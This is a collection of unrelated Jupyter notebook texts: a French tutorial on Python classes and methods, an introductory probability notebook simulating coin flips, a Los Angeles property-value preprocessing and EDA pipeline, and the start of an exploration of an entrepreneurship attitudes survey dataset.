Vous avez des variables, qui contiennent vos données, et des fonctions. Vous passez vos variables à vos fonctions – qui agissent sur elles et peut-être les modifient. L'inteaction entre les variables et les fonctions n'est pas toujours simple à gérer comme on l'a vu dans le classeur précédent ! ou bien une variable est locale et n'est pas visible des autres fonction, ou bien une variable est globale et toutes les fonctions sont suceptibles d'y avoir accès.
On touche ici aux limites de la programmation procédurale, lorsque le nombre de fonctions et de variables devient important.
## Mais qu’est ce qu’un Objet ?
En Python les éléments de base de la programmation que nous avons rencontré comme les chaînes de caractères, ou les listes sont des objets. Ils possèdent des *propriétés* - variables qui stockent des valeurs - et des *méthodes* - fonctions qui agissent sur ces valeurs.
Voici un petit exemple d'objet qui vous est déjà familier :
```
liste=[3,5,4,2,8,5,4]
liste.sort()
liste
```
Ici nous avons fait appel à la *méthode* **sort()** de l'*objet* **liste** afin de trier notre liste.
Mais dans nos projets futurs, nous pouvons avoir envie de définir nos propres objets, c'est à dire d'enrichir la bibliothèque de types ***built-in*** standard de Python avec des objets que nous façonnerons selon nos besoins. C'est la qu'intervient la notion de classe.
# Création d'une classe
En premier exemple, supposons que nous voulions travailler sur un logiciel de géométrie. Nous avons besoin d'un ***objet*** point qui est un nouveau type d'objet contenant deux informations :
- l'abscisse de notre point
- l'ordonnée de notre point.
Ces deux informations sont ce que nous appelons en POO des ***attributs*** ou des ***propriétés***.
Assez de discours, créons notre classe :
```
class Point():
abscisse=0
ordonnee=0
```
Et c'est tout !!! nous avons créé une classe contenant deux ***propriétés*** une abscisse et une ordonnée toutes deux initialisées à 0.
Comment ça marche ?
```
print (Point.abscisse)
print (Point.ordonnee)
Point.abscisse=2
print (Point.abscisse)
```
Ca a l'air trè simple ! En réalité, nous allons vite être limité si nous n'utilisons que cette classe. En effet, nous créé un objet classe *Point* qui contient deux informations. Mais dans notre logiciel de géométrie, nous voulons créer plusieurs points !!
C'est le moment de parler de la notion ***d'instance***. Une instance est un objet que nous créons en mémoire à partir d'une classe. Voici comment :
```
p1=Point()
p2=Point()
p1.abscisse=2
p2.ordonnee=3
print (p1.abscisse,p1.ordonnee)
print (p2.abscisse,p2.ordonnee)
```
Nous y voila ! J'ai donc à présent la possibilité de créer autant de points que je veux. Il faut bien distinguer la notion de ***classe*** et la notion ***d'instance*** :
- une ***classe*** peut être vue comme le prototype permettant de créer nos instances
- les ***instances*** sont les véritables objets que nos manipulerons, créés à partir de notre ***prototype***.
Pour bien comprendre ce phénomène, prenons une comparaison avec le monde des contructeurs automobile : Lorsqu'un contructeur va sortir une nouvelle voiture, il ne va pas immédiatement produire en série plusieurs millions de véhicules. Il va tout d'abord élaborer un ***prototype*** :
- d'abord sur ***papier***, il va dessiner sa nouvelle voiture, les formes, les équipements, chaque pièce de sa voiture etc...
- ensuite il va réaliser une maquette, la tester en soufflerie pour affiner sa forme
- enfin, il va réaliser un modèle fonctionnelle qu'il testera sur route : c'est le prototype.
C'est ce travail que nous réaliserons lorsque nous construirons notre ***classe***. Construire une classe c'est construire un ***prototype unique***.
Une fois notre prototype terminé, notre constructeur va passer à la ***production en série***. Il va créer des millions ***d'instances*** de notre prototype qui sont les voitures ***créées en série à partir de notre prototype***. Chaque ***instance*** pourra être personnalisé à partir de notre prototype : en effet chaque nouvelle voiture possèdera sa propre couleur qui n'est pas forcément celle de notre prototype, possèdera des options spécifique (gps, toit ouvrant etc...).
Retenez donc cette comparaison :
- la ***classe*** correspond à notre ***prototype***
- l'***instance*** correspond à la voiture produite ***en série*** à partie de notre protptype (la classe).
## Notion de méthode
Nous avons créé notre objet point qui se caractérise par deux ***propriétés*** : abscisse et ordonnée. Mais si ce n'était que cela, pourquoi ne pas utiliser un tuple ! Nous allons donc enrichir notre classe (le prototype servant de modèle pour créer nos points) en y ajoutant des fonctions uniques : les ***méthodes***.
Nous nous intéressons par exemple à la distance séparant notre point de l'origine du repère. Nous souhaiterions que notre objet point possède une ***méthode*** pour nous renvoyer cette information. Une ***méthode*** n'est autre qu'une ***fonction*** intégrée à un objet. Voici comment procéder. Nous allons modifier notre ***classe*** :
```
from math import sqrt # On a besoin de la racine carrée !
class Point():
abscisse=0
ordonnee=0
def distanceAZero (self):
return sqrt (self.abscisse**2+self.ordonnee**2)
```
Regardons le résultat :
```
p1=Point()
p1.abscisse=3
p1.ordonnee=4
print(p1.distanceAZero())
```
Et voila ! notre ***objet*** point commence à prendre tournure : il possède
- deux ***propriétés*** : *abscisse* et *ordonnee*
- une ***méthode*** : *distanceAZero()*
Cette méthode est une fonction encapsulée dans notre objet qui agit sur ses propriétés et effecture le travail demandé. Revenons sur la déclaration de cette méthode :
Une méthode se déclare comme une c=fonction classique à l'*intérieur de la classe* à ceci près qu'elle prend toujours ***en premier argument l'instance sur laquelle elle agit***. Par convention, nous nommons cette instance ***self***.
Nous voyons sur l'exemple de la *distanceAZero* l'avantage de disposer de cette information d'instance : nous voulons que la méthode agisse sur l'***instance*** depuis laquelle elle a été appelée et non sur les propriétés de la classe (le prototype). La variable ***self*** nous permettra de connaître l'instance sur laquelle nous travaillons.
Reste à décrire la syntaxe un peu étrange de cette fonction : Si ***self*** est le premier argument, pourquoi ne le trouve t-on pas lors de l'appel de la fonction *distanceAZero()* ? Voici l'explication.
En réalité, nous devrions passer l'appel à la méthode de cette manière :
```
print(Point.distanceAZero(p1))
```
Ainsi nous voyons bien que distanceAZero accepte bien l'instance sur laquelle elle agit en premier paramètre et que c'est une fonciton intégrée à la classe ***Point***. Néanmoins cette syntaxe est très lourde ! Imaginez taper la ligne suivante à la place de
liste.append(5)
```
list.append(liste,'autre syntaxe')
# Et pourtant cela foncitonne !
print(liste)
```
Dans la pratique, une méthode sera toujours appelée depuis une instance et le premier paramètre sera omis puisque il est donnée justement par l'instance qui appelle. Syntaxiquement, les deux formes
Point.distanceAZero(p1)
et
p1.distanceAZero()
sont équivalentes. Nous utiliserons systématiquement la seconde forme.
## A vous de jouer
Vous allez enrichir la classe ***Point*** en ajoutant
- une propriété ***nom*** contenant le nom du point (par défaut 'A')
- une méthode ***distance(p)*** qui
- affichera untexte du type "La distance AB=5" avec bien sur les vrais noms des points et la vraie distance
- retournera la distance du point au point *p* passé en argument.
Attention, je rappelle qu'une méthode prend ***toujours*** en premier argument ***self***.
```
from math import sqrt # On a besoin de la racine carrée !
# Redéfinissez votre classe
# YOUR CODE HERE
raise NotImplementedError()
```
Pour tester votre classe, validez la cellule suivante. La réponse doit être :
La distance AB = 5.0
Out[...]:5.0
```
p1=Point()
p1.abscisse=2
p1.ordonnee=3
p2=Point()
p2.abscisse=-1
p2.ordonnee=7
p2.nom='B'
assert p1.distance(p2)==5.0
```
# Surcharge des opérateurs
On peut améliorer un peu le comportement de notre classe en initialisant de manière plus propre les différentes propriétés. En effet, pour le moment, pour créer un point avec le bon nom et les coordonnées souhaitées, nous avons besoin de 4 lignes !
p1=Point()
p1.abscisse=2
p1.ordonnee=3
p1.nom='P'
On peut faire beaucoup mieux en ***surchargeant*** la méthode ***__init()__*** qui est une méthode spéciale appelée automatiquement lors de la création d'ue instance. Cette méthode prend
- en premier paramètre ***self*** bien évidemment!
- en paramètres optionnels, des paramètres passés à la classe lors de la création.
```
class Point():
def __init__(self,x,y,nom):
self.abscisse=x
self.ordonnee=y
self.nom=nom
def distanceAZero (self):
return sqrt (self.abscisse**2+self.ordonnee**2)
def distance(self, p):
d=sqrt((self.abscisse-p.abscisse)**2+(self.ordonnee-p.ordonnee)**2)
print ("La distance ",self.nom+p.nom,"=",d)
return d
```
Regardons comment créer notre point :
```
p1=Point(2,3,'A')
p2=Point(-1,7,'B')
p1.distance(p2)
```
C'est quand même bien mieux ! Mais tout n'est pas parfait. Observez ce qui se passe si je veux afficher les coordonnées d'un point. Je peux avoir envie de faire cela :
```
print(p1)
# beark
```
## A vous de jouer
Il existe une autre méthode *magique* - en réalité, il y en a environs 80 - permettant de redéfinir le comportement des opérateurs intégrés à Python. Vous allez créer une méthode nommée ***__str()__*** qui
- ne prendra pas d'argument autre que ***self*** bien sur
- retournera une chaîne de caractère du type "A(2;3)"
Pour construire votre chaîne, vous pourrez utiliser la concaténation de chaines de caractères au moyen de l'opérateur +. Regardez l'exemple :
```
x,y=2,3
chaine="A"+str(x)+"; etc..."
# etc... vous voyez le principe
print(chaine)
# A vous de jouer
# YOUR CODE HERE
raise NotImplementedError()
# Et voila la magie qui s'opère !
p1=Point(2,3,'A')
print(p1)
assert p1.__str__()=='A(2;3)'
```
Et voila, bien venue dans le monde merveilleux des objets.
En seconde partie, nous allons prendre un exemple plus sofistiqué sur les polynomes pour approfondir les notions que nous avons introduites dans ce classeur.
A bientôt !
| github_jupyter |
<h1>Table of Contents<span class="tocSkip"></span></h1>
<div class="toc"><ul class="toc-item"><li><span><a href="#What-is-Probability-Theory?" data-toc-modified-id="What-is-Probability-Theory?-1"><span class="toc-item-num">1 </span>What is Probability Theory?</a></span><ul class="toc-item"><li><span><a href="#A-simple-(?)-question" data-toc-modified-id="A-simple-(?)-question-1.1"><span class="toc-item-num">1.1 </span>A simple (?) question</a></span></li><li><span><a href="#Simulating-coin-flips" data-toc-modified-id="Simulating-coin-flips-1.2"><span class="toc-item-num">1.2 </span>Simulating coin flips</a></span></li><li><span><a href="#Summary" data-toc-modified-id="Summary-1.3"><span class="toc-item-num">1.3 </span>Summary</a></span></li></ul></li><li><span><a href="#What-is-probability-theory?" data-toc-modified-id="What-is-probability-theory?-2"><span class="toc-item-num">2 </span>What is probability theory?</a></span></li></ul></div>
```
%pylab inline
```
# What is Probability Theory?
* Probability Theory is a **mathematical** framework for computing the probability of complex events.
* Under the assumption that **we know the probabilities of the basic events.**
* What is the precise meaning of <font color='red'>"probability"</font> and <font color='red'>"event"</font>?
* We will give precise definitions later in the class.
* For now, we'll rely on common sense.
## A simple (?) question
We all know that if one flips a fair coin then the outcome is "heads" or "tails" with equal probabilities.
What does that mean?
It means that if we flip the coin $k$ times, for some large value of $k$, say $k=10,000$,
Then the number of "heads" is **about** $\frac{k}{2}=\frac{10,000}{2} = 5,000$
What do we mean by **about** ??
## Simulating coin flips
We will use the pseudo random number generators in `numpy` to simulate the coin flips.
instead of "Heads" and "Tails" we will use $x_i=1$ or $x_i=-1$ and consider the sum $S_{10000} = x_1+x_2+\cdots+x_{10000}$.
If the number of heads is about 5,000 then $S_{10000}\approx 0$
We will vary the number of coin flips, which we denote by $k$
```
# Generate the sum of k coin flips, repeat that n times
def generate_counts(k=1000,n=100):
X=2*(random.rand(k,n)>0.5)-1 # generate a kXn matrix of +-1 random numbers
S=sum(X,axis=0)
return S
k=1000
n=1000
counts=generate_counts(k=k,n=n)
figure(figsize=[10,4])
hist(counts);
xlim([-k,k])
xlabel("sum")
ylabel("count")
title("Histogram of coin flip sum when flipping a fair coin %d times"%k)
grid()
```
Note that the sum $S_{1000}$ is not **exactly** $0$, it is only **close to** $0$.
Using **probability theory** we can calculate **how small** is $\big|S_k\big|$
In a later lesson we will show that the probability that
$$\big| S_k \big| \geq 4\sqrt{k}$$
is smaller than $2 \times 10^{-8}$ which is $0.000002\%$
Let's use our simulation to demonstrate that this is the case:
```
from math import sqrt
figure(figsize=[13,3.5])
for j in range(2,5):
k=10**j
counts=generate_counts(k=k,n=100)
subplot(130+j-1)
hist(counts,bins=10);
d=4*sqrt(k)
plot([-d,-d],[0,30],'r')
plot([+d,+d],[0,30],'r')
grid()
title('%d flips, bound=+-%6.1f'%(k,d))
figure(figsize=[13,3.5])
for j in range(2,5):
k=10**j
counts=generate_counts(k=k,n=100)
subplot(130+j-1)
hist(counts,bins=10);
xlim([-k,k])
d=4*sqrt(k)
plot([-d,-d],[0,30],'r')
plot([+d,+d],[0,30],'r')
grid()
title('%d flips, bound=+-%6.1f'%(k,d))
```
## Summary
We did some experiments summing $k$ random numbers: $S_k=x_1+x_2+\cdots+x_k$
$x_i=-1$ with probability $1/2$, $x_i=+1$ with probability $1/2$
Our experiments show that the sum $S_k$ is (almost) always in the range $\big[-4\sqrt{k},+4\sqrt{k}\big]$
$$\mbox{ If } k \to \infty,\;\;\; \frac{4 \sqrt{k}}{k} = \frac{4}{\sqrt{k}} \to 0$$
$$ \mbox{Therefor if }\;\;k \to \infty, \frac{S_k}{k} \to 0$$
# What is probability theory?
It is the math involved in **proving** (a precise version of) the statements above.
In most cases, we can **approximate** probabilities using simulations (Monte-Carlo simulations)
Calculating the probabilities is better because:
* It provides a precise answer
* It is much faster than Monte Carlo simulations.
** <font size=4 > Up Next: What is Statistics ?</font> **
| github_jupyter |
```
# Data manipulation
import pandas as pd
import numpy as np
# Data Viz
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
# More Data Preprocessing & Machine Learning
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, normalize
import warnings
warnings.filterwarnings('ignore')
df = pd.read_csv('properties.csv')
```
## Initial Data Preprocessing
### Sanity Check
```
# TO DO: check uniqueness
print(df.id.nunique() == len(df))
print(df.AIN.nunique() == len(df))
# TO DO: check one level categorical features
df.isTaxableParcel.value_counts()
df = df.drop(['isTaxableParcel'], axis = 1)
# TO DO: remove features that are improper for modelling
df = df.drop(['id','AIN','AssessorID','SpecificUseType','CENTER_LAT','CENTER_LON','City','RollYear'], axis = 1)
df = df[(df.EffectiveYearBuilt != 0) | (df.LandBaseYear != 0)]
df = df[df.EffectiveYearBuilt >= df.YearBuilt.min()]
df = df[df.ImpBaseYear != 0]
```
### Feature Creation
```
# TO DO: create proportion-based features
# Total value = LandValue + ImprovementValue + FixtureValue + PersonalPropertyValue
df['LandValue_percent'] = df['LandValue']/df['TotalValue']
df['PersonalPropertyValue_percent'] = df['PersonalPropertyValue']/df['TotalValue']
df['TotalExemption_percent'] = df['TotalExemption']/df['TotalValue']
# Other proportion-based features
df['ZHVI_sf'] = df['ZHVI']/df['SQFTmain']
df['Bathroom_per_bedroom'] = df['Bathrooms']/df['Bedrooms']
df['Price_per_unit'] = df['TotalValue']/df['Units']
# TO DO: aviod multicolinearity
df = df.drop(['LandValue','ImprovementValue','PersonalPropertyValue','TotalExemption','SQFTmain','Bathrooms'], axis = 1)
# TO DO: create difference-based features
df['years_until_effective'] = df['EffectiveYearBuilt'] - df['YearBuilt']
df = df.drop(['EffectiveYearBuilt'], axis = 1)
df['BaseYear_difference'] = df['ImpBaseYear'] - df['LandBaseYear']
df = df.drop(['ImpBaseYear'], axis = 1)
# TO DO: aviod multicolinearity
# Total exemption value = HomeownersExemption + RealEstateExemption + FixtureExemption + PersonalPropertyExemption
df = df.drop(['FixtureExemption','PersonalPropertyExemption'], axis = 1)
# TotalLandImpValue = LandValue + ImprovementValue
df = df.drop(['Cluster','TotalLandImpValue','RecordingDate','netTaxableValue'], axis = 1)
# TO DO: create a identifier for EDA
df['school_district'] = 'ucla'
df['school_district'][df.distance_to_usc<=3] = 'usc'
```
### Missing Values Management
```
def plot_NA(dataframe, benchmark, bins):
## Assessing Missing Values per Column
na_info = dataframe.isnull().sum()/len(dataframe)*100
na_info = na_info.sort_values(0, ascending=True).reset_index()
na_info.columns = ['feature','% of NA']
na_info['higher than benchmark'] = (na_info['% of NA']>= benchmark)
fig, (ax1, ax2) = plt.subplots(1,2, figsize=(16,5))
colours = {True: "red", False: "skyblue"}
na_info.plot('feature','% of NA',kind='barh', color=na_info['higher than benchmark'].replace(colours),ax=ax1)
ax1.vlines(x=benchmark, ymin=0, ymax=100, color='red', linestyles='dashed')
ax1.set_title('Distribution of % of Missing Values per Feature')
ax1.set_ylabel('feature')
ax1.set_xlabel('% of NA')
ax1.get_legend().remove()
print('NAs per Feature:')
print(na_info,end='\n\n')
## Assessing Missing Values per Row
dataframe['NA_this_row'] = dataframe.isna().sum(axis=1) # the number of NA values per row
ax2.hist(dataframe['NA_this_row'], bins=bins)
ax2.set_title('Distribution of Amount of Missing Values per Row')
ax2.set_xlabel('Missing Values per Row')
ax2.set_ylabel('Number of Records')
temp = dataframe['NA_this_row'].value_counts(normalize=True)
print('NAs per Row:')
print('count percent')
print(temp)
## TO DO: Assess missing values by columns and rows
plot_NA(df, benchmark=5, bins=5)
## TO DO: fill missing values (NAs or inf) with -1
df['Bathroom_per_bedroom'].fillna(value=-1, inplace=True)
df['Bathroom_per_bedroom'][df.Bathroom_per_bedroom == np.inf] = -1
df['Price_per_unit'][df.Price_per_unit == np.inf] = -1
```
Obviously, the NAs in *Bathroom_per_bedroom* and *Price_per_unit* due to zero denominator. Rather than simply remove those properties, here we mark those missing values specially as -1 to avoid introducing any bias or losing information.
```
df = df.drop('NA_this_row', axis=1)
```
### Handle Outliers
```
## TO DO: detect outliers through extreme values
df.describe().T
# TO DO: identify outliers as data point that falls outside of 3 standard deviations
def replace_outliers_z_score(dataframe, column, Z=3):
from scipy.stats import zscore
df = dataframe.copy(deep=True)
df.dropna(inplace=True, subset=[column])
# Calculate mean without outliers
df["zscore"] = zscore(df[column])
mean_ = df[(df["zscore"] > -Z) & (df["zscore"] < Z)][column].mean()
# Replace with mean values
no_outliers = dataframe[column].isnull().sum()
dataframe[column] = dataframe[column].fillna(mean_)
dataframe["zscore"] = zscore(dataframe[column])
dataframe.loc[(dataframe["zscore"] < -Z) | (dataframe["zscore"] > Z),column] = mean_
# Print message
print("Replaced:", no_outliers, " outliers in ", column)
return dataframe.drop(columns="zscore")
## TO DO: replace potential outliers with mean
cat_cols = df.select_dtypes(['int','float']).columns.values
i = 1
for col in cat_cols:
df = replace_outliers_z_score(df,col)
```
## EDA
```
## TO DO: correct feature types
df.zip2 = df.zip2.astype('int')
df.zip2 = df.zip2.astype('object')
df.YearBuilt = df.YearBuilt.astype('object')
df.AdministrativeRegion = df.AdministrativeRegion.astype('object')
df.PropertyType = df.PropertyType.astype('object')
# TO DO: Calculate correlation of features for UCLA district
correlation = df[df.school_district=='ucla'].corr()
mask = np.zeros_like(correlation)
mask[np.triu_indices_from(mask)] = True
# Plot correlation
plt.figure(figsize=(18,18))
sns.heatmap(correlation, mask=mask, cmap="RdBu_r",xticklabels=correlation.columns.values, yticklabels=correlation.columns.values, annot = True, annot_kws={'size':10})
# Axis ticks size
plt.xticks(fontsize=10)
plt.yticks(fontsize=10)
plt.show()
```
All of the correlation coefficients are less than 0.95, no significant multicolinearity.
```
# TO DO: Calculate correlation of features for USC district
correlation = df[df.school_district=='usc'].corr()
mask = np.zeros_like(correlation)
mask[np.triu_indices_from(mask)] = True
# Plot correlation
plt.figure(figsize=(18,18))
sns.heatmap(correlation, mask=mask, cmap="RdBu_r",xticklabels=correlation.columns.values, yticklabels=correlation.columns.values, annot = True, annot_kws={'size':10})
# Axis ticks size
plt.xticks(fontsize=10)
plt.yticks(fontsize=10)
plt.show()
```
All of the correlation coefficients are less than 0.95, no significant multicolinearity.
```
# TO DO: remove geographic identifier for EDA
df_clean = df.drop('PropertyLocation',axis=1)
# TO DO: plot categorical features
plt.figure(figsize=(12, 12))
cat_cols = df_clean.select_dtypes(['object']).columns.values
i = 1
for col in cat_cols:
plt.subplot(2, 2, i)
sns.countplot(y=df_clean[col],hue='school_district',data=df_clean)
plt.xticks()
plt.tick_params(labelbottom=True)
i += 1
plt.tight_layout()
# TO DO: plot numerical features
plt.figure(figsize=(15, 13))
cat_cols = df_clean.select_dtypes(['int64']).columns.values
i = 1
for col in cat_cols:
plt.subplot(4, 3, i)
sns.histplot(x=df_clean[col],kde=True, hue='school_district',data=df_clean)
#res = stats.probplot(df_clean[col], plot=plt)
#sns.boxplot(y=df_clean['price_sf'],x=col, data=df_clean ,color='green')
plt.xticks(rotation=0)
plt.tick_params()
i += 1
plt.tight_layout()
```
YearBuilt shows distinct pattern, properties in UCLA district are younger than those in USC district overall. UCLA district shows higher ZHVI.
```
# TO DO: plot numerical float features
plt.figure(figsize=(10, 10))
cat_cols = df_clean.select_dtypes(['float']).columns.values
i = 1
for col in cat_cols:
#plt.subplot(4, 4, i)
sns.displot(x=df_clean[col], hue='school_district',data=df_clean)
#res = stats.probplot(df_clean[col], plot=plt)
#sns.boxplot(y=df_clean['price_sf'],x=col, data=df_clean ,color='green')
plt.xticks(rotation=0)
plt.tick_params()
i += 1
plt.tight_layout()
df_clean.info()
```
## Feature Engineering
### One-hot Encoding
```
df_clean.head().T
# TO DO: drop some multivariate features for computational simplicity
df_clean = df_clean.drop(['LandBaseYear', 'RecordingDateYear'],axis=1)
## TO DO: separate the one-hot dataset for two schools
df_ucla = df_clean[df_clean.school_district == 'ucla']
df_ucla = df_ucla.drop('school_district',axis=1)
df_usc = df_clean[df_clean.school_district == 'usc']
df_usc = df_usc.drop('school_district',axis=1)
# TO DO: Create dummy variables for ucla
cat1 = pd.get_dummies(df_ucla.zip2, prefix = "zip")
cat2 = pd.get_dummies(df_ucla.AdministrativeRegion, prefix = "Region")
cat3 = pd.get_dummies(df_ucla.PropertyType, prefix = "PropertyType")
cat4 = pd.get_dummies(df_ucla.YearBuilt, prefix = "YearBuilt")
#cat5 = pd.get_dummies(df_clean.LandBaseYear, prefix = "LandBaseYear")
#cat6 = pd.get_dummies(df_clean.RecordingDateYear, prefix = "RecordingDateYear")
# TO DO: Merge dummy variables to main dataframe
ucla_hot = pd.concat([df_ucla,cat1], axis=1)
ucla_hot = pd.concat([ucla_hot,cat2], axis=1)
ucla_hot = pd.concat([ucla_hot,cat3], axis=1)
ucla_hot = pd.concat([ucla_hot,cat4], axis=1)
#df_hot = pd.concat([df_hot,cat5], axis=1)
#df_hot = pd.concat([df_hot,cat6], axis=1)
# TO DO: Correct the data type
for cat in [cat1,cat2, cat3, cat4]:
cat_cols = cat.columns
for col in cat_cols:
ucla_hot[col] = ucla_hot[col].astype("category")
# TO DO: drop original features
ucla_hot = ucla_hot.drop(["zip2","PropertyType","YearBuilt","zip_90057"], axis=1)
ucla_hot.head().T
# TO DO: Create dummy variables for ucla
cat1 = pd.get_dummies(df_usc.zip2, prefix = "zip")
cat2 = pd.get_dummies(df_usc.AdministrativeRegion, prefix = "Region")
cat3 = pd.get_dummies(df_usc.PropertyType, prefix = "PropertyType")
cat4 = pd.get_dummies(df_usc.YearBuilt, prefix = "YearBuilt")
#cat5 = pd.get_dummies(df_clean.LandBaseYear, prefix = "LandBaseYear")
#cat6 = pd.get_dummies(df_clean.RecordingDateYear, prefix = "RecordingDateYear")
# TO DO: Merge dummy variables to main dataframe
usc_hot = pd.concat([df_usc,cat1], axis=1)
usc_hot = pd.concat([usc_hot,cat2], axis=1)
usc_hot = pd.concat([usc_hot,cat3], axis=1)
usc_hot = pd.concat([usc_hot,cat4], axis=1)
#df_hot = pd.concat([df_hot,cat5], axis=1)
#df_hot = pd.concat([df_hot,cat6], axis=1)
# TO DO: Correct the data type
for cat in [cat1,cat2, cat3, cat4]:
cat_cols = cat.columns
for col in cat_cols:
usc_hot[col] = usc_hot[col].astype("category")
# TO DO: drop original features
usc_hot = usc_hot.drop(["zip2","PropertyType","YearBuilt","zip_90023", "zip_90063"], axis=1)
usc_hot.head().T
```
### Data Scaling
for ucla
```
# TO DO: split the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_ucla = ucla_hot.drop(['price_sf'], axis = 1)
y_ucla = ucla_hot['price_sf']
X_train, X_test, y_train, y_test = train_test_split(X_ucla, y_ucla, test_size = 0.2, random_state = 99)
# TO DO: separate numerical and categorical features
X_train_num = X_train.select_dtypes(['int','float'])
X_train_cat = X_train.select_dtypes(['category'])
X_test_num = X_test.select_dtypes(['int','float'])
X_test_cat = X_test.select_dtypes(['category'])
# TO DO: standardize the data for UCLA
from sklearn.preprocessing import StandardScaler
scaler_ucla = StandardScaler()
X_train_num_scaled = pd.DataFrame(scaler_ucla.fit_transform(X_train_num))
X_train_num_scaled.columns = X_train_num.columns
X_train_num_scaled.index = X_train_num.index
X_test_num_scaled = pd.DataFrame(scaler_ucla.transform(X_test_num))
X_test_num_scaled.columns = X_test_num.columns
X_test_num_scaled.index = X_test_num.index
# TO DO: combine the scaled the part with categorical features
X_train_ucla_scaled = pd.concat([X_train_num_scaled,X_train_cat.sort_index()], axis=1)
X_test_ucla_scaled = pd.concat([X_test_num_scaled,X_test_cat.sort_index()], axis=1)
# TO DO: scale the target
scaler_y_ucla = StandardScaler()
y_train_ucla_scaled = scaler_y_ucla.fit_transform(y_train.values.reshape(-1, 1))
y_test_ucla_scaled = scaler_y_ucla.transform(y_test.values.reshape(-1, 1))
```
for usc
```
# TO DO: split the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_usc = usc_hot.drop(['price_sf'], axis = 1)
y_usc = usc_hot['price_sf']
X_train, X_test, y_train, y_test = train_test_split(X_usc, y_usc, test_size = 0.2, random_state = 99)
# TO DO: separate numerical and categorical features
X_train_num = X_train.select_dtypes(['int','float'])
X_train_cat = X_train.select_dtypes(['category'])
X_test_num = X_test.select_dtypes(['int','float'])
X_test_cat = X_test.select_dtypes(['category'])
# TO DO: standardize the data for USC
from sklearn.preprocessing import StandardScaler
scaler_usc = StandardScaler()
X_train_num_scaled = pd.DataFrame(scaler_usc.fit_transform(X_train_num))
X_train_num_scaled.columns = X_train_num.columns
X_train_num_scaled.index = X_train_num.index
X_test_num_scaled = pd.DataFrame(scaler_usc.transform(X_test_num))
X_test_num_scaled.columns = X_test_num.columns
X_test_num_scaled.index = X_test_num.index
# TO DO: combine the scaled the part with categorical features
X_train_usc_scaled = pd.concat([X_train_num_scaled,X_train_cat.sort_index()], axis=1)
X_test_usc_scaled = pd.concat([X_test_num_scaled,X_test_cat.sort_index()], axis=1)
# TO DO: scale the target
scaler_y_usc = StandardScaler()
y_train_usc_scaled = scaler_y_usc.fit_transform(y_train.values.reshape(-1, 1))
y_test_usc_scaled = scaler_y_usc.transform(y_test.values.reshape(-1, 1))
```
### Output for Modelling
```
X_train_ucla_scaled.to_csv('X_train_ucla.csv')
X_test_ucla_scaled.to_csv('X_test_ucla.csv')
pd.DataFrame(y_train_ucla_scaled).to_csv('y_train_ucla.csv')
pd.DataFrame(y_test_ucla_scaled).to_csv('y_test_ucla.csv')
X_train_usc_scaled.to_csv('X_train_usc.csv')
X_test_usc_scaled.to_csv('X_test_usc.csv')
pd.DataFrame(y_train_usc_scaled).to_csv('y_train_usc.csv')
pd.DataFrame(y_test_usc_scaled).to_csv('y_test_usc.csv')
```
## Results Analysis (after modelling)
for ucla
```
# TO DO: import predicted results of our best model
y_pred_ucla = pd.read_csv('y_pred_svr_ucla.csv')
y_pred_ucla = y_pred_ucla.drop('Unnamed: 0',axis=1)
y_pred_usc = pd.read_csv('y_pred_svr_usc.csv')
y_pred_usc = y_pred_usc.drop('Unnamed: 0',axis=1)
# TO DO: transfrom back to price_sf
y_pred_ucla = pd.DataFrame(scaler_y_ucla.inverse_transform(y_pred_ucla))
y_pred_ucla.index = X_test_ucla_scaled.index
y_pred_usc = pd.DataFrame(scaler_y_usc.inverse_transform(y_pred_usc))
y_pred_usc.index = X_test_usc_scaled.index
# TO DO: obtain the full properties info
fullset = df[['PropertyLocation','price_sf']]
# TO DO: obtain the expected value of the SE model for ucla
scaler_y_ucla.inverse_transform(np.zeros((9541, 1)))[0]
# TO DO: combine ucla price outputs with property Location
ucla_result = pd.merge(fullset,y_pred_ucla,left_index=True,right_index=True)
ucla_result = ucla_result.rename(columns={0:'price_hat'})
# TO DO: naive adjustment
ucla_result['price_hat_adjusted'] = (ucla_result['price_hat'] - ucla_result['price_sf'] )*3 # naive adjustment
ucla_opp = ucla_result[ucla_result.price_hat_adjusted >= 553].sort_values('price_hat_adjusted')
ucla_opp
# TO DO: calculate opportunities density
len(ucla_opp)/len(ucla_result)
```
for USC
```
# TO DO: obtain the expected value of the SE model for usc
scaler_y_usc.inverse_transform(np.zeros((9541, 1)))[0]
# TO DO: combine usc price outputs with property Location
usc_result = pd.merge(fullset,y_pred_usc,left_index=True,right_index=True)
usc_result = usc_result.rename(columns={0:'price_hat'})
# TO DO: naive adjustment
usc_result['price_hat_adjusted'] = (usc_result['price_hat'] - usc_result['price_sf'] )*3
usc_opp = usc_result[usc_result.price_hat_adjusted>242].sort_values('price_hat_adjusted')
usc_opp
# TO DO: calculate opportunities density
len(usc_opp)/len(usc_result)
# TO DO: opportunities exploration
# ucla_result[ucla_result.price_hat_adjusted>700][ucla_result['PropertyLocation'].str.find('SANTA ') != -1]
```
| github_jupyter |
### Dependencies for the Project
```
import pandas as pd
from sqlalchemy import create_engine, inspect
from db_config import password
import psycopg2
```
### Importing the CSV file for Behavior and Attitudes
```
file = "./Resources/Behavior_and_Attitudes.csv"
Behavior_and_Attitudes= pd.read_csv(file)
Behavior_and_Attitudes.head()
```
### Exploring the Database
#### No of unique countries in the Survey
```
print(f"No of unique countries in the survey : {len(Behavior_and_Attitudes['economy'].unique())}")
```
#### Understanding the Number of economies every year.
We could see that not every country is been surveyed in all the years. 2001 was the year with minimum countries(28) in the survey and 2013 and 2014 had 70 countries participating. The latest year 2019 have 50 economies surveyed.
```
Behavior_and_Attitudes["year"].value_counts()
```
#### Null Values
The dataset have null values in certain column and that has been identified below. The columns with null values are,
1. Fear of failure rate *
2. Entrepreneurial intentions
3. Established Business Ownership
4. Entrepreneurial Employee Activity
5. Motivational Index
6. Female/Male Opportunity-Driven TEA
7. High Job Creation Expectation
8. Innovation
9. Business Services Sector
10. High Status to Successful Entrepreneurs
11. Entrepreneurship as a Good Career Choice
```
# identifying missing values
Behavior_and_Attitudes.count()
```
### Fear of failure rate--dealing with null value
```
# Fear of failure rate has just one null value. identifying the row or economy with null value
Behavior_and_Attitudes.loc[Behavior_and_Attitudes["Fear of failure rate *"].isna()]
# pulling all the data point related to Venezuela
Behavior_and_Attitudes.loc[Behavior_and_Attitudes["economy"]=="Venezuela"]
```
#### Treating the one null value in Fear of Failure rate
